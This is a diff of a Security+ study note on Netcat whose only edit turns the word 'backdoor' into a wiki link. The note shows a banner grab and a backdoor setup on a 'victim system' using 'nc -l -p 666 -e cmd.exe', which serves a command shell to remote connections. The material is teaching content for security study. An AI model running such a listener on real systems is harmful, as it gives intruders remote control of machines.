Fleckism/SecurityPlus/3 Performing Security Assessments/3A Assess Organizational Security L3a.md

 echo "head" | nc 10.1.0.1 -v 80

 Netcat can also establish connections with remote machines.
-To configure Netcat as a backdoor, you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic from a program, such as the command interpreter, to its handler:
+To configure Netcat as a [[backdoor]], you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic from a program, such as the command interpreter, to its handler:

 nc -l -p 666 -e cmd.exe